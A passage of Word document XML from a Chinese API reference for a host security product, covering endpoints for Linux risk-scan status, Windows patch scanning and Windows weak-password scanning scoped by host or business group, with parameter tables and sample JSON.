            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E550BFB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C9D0317" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8C4BBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17428F51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F80E16D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FB97FE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="255" w:name="_Toc115166202"/>
      <w:bookmarkStart w:id="256" w:name="linux全部风险扫描状态查询除风险文件外"/>
      <w:bookmarkEnd w:id="254"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>全部风险扫描状态查询(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>除风险</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>文件外)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w14:paraId="6A6D04C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>全部风险扫描状态查询的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735D3F26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4C947B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23E9204E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41892036" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A58338" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7DFC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//当前job的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>如果为null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>则当前没有job执行</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>Running|Success|Failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F8B82"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4422"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A24E9E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3D7F45B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EC64A42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="581BA1EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="371F62FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31BCB266" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="052E685D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60666DA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5489B6DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="423977FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID，如果为null，则当前没有job执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BDC7B17" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F14C135" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A44D30A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D60F6BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE64472" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行中；成功；失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="046B0B9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="_Toc115166203"/>
      <w:bookmarkStart w:id="258" w:name="windows补丁扫描增加范围筛选"/>
      <w:bookmarkEnd w:id="256"/>
      <w:r>
        <w:t>windows补丁扫描增加范围筛选</w:t>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
    </w:p>
    <w:p w14:paraId="19A902AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>提供windows补丁扫描指定扫描主机范围的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D806EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118EA3C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/win/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D5EBC"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BC669E" w14:paraId="6875379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F98258A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AE517C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01CDA521" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49449E2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6261D3D6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73E23D0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494CE11B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2564AA71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21EB7E87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组范围</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60C0FF19" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E08ADEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E05609A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F579EF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F79DA85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01462BDD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="670759AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2007CB11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66060BC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10FE27B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C0D8058" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D019F9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325521C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD9DAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9682CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B25294D"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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAE2A3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53975A00"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706484CB"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4EB8BDD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B4754EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9231F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35937BBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75FEE589" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A6B0C72" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2057D1BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64158045" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E6BDA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A062FF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37C9329A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_Toc115166204"/>
      <w:bookmarkStart w:id="260" w:name="window弱密码扫描增加扫描范围筛选"/>
      <w:bookmarkEnd w:id="258"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>window弱密码扫描增加扫描范围筛选</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
    </w:p>
    <w:p w14:paraId="3CA718D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>提供windows弱密码扫描指定扫描主机范围的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717089E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0566692A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
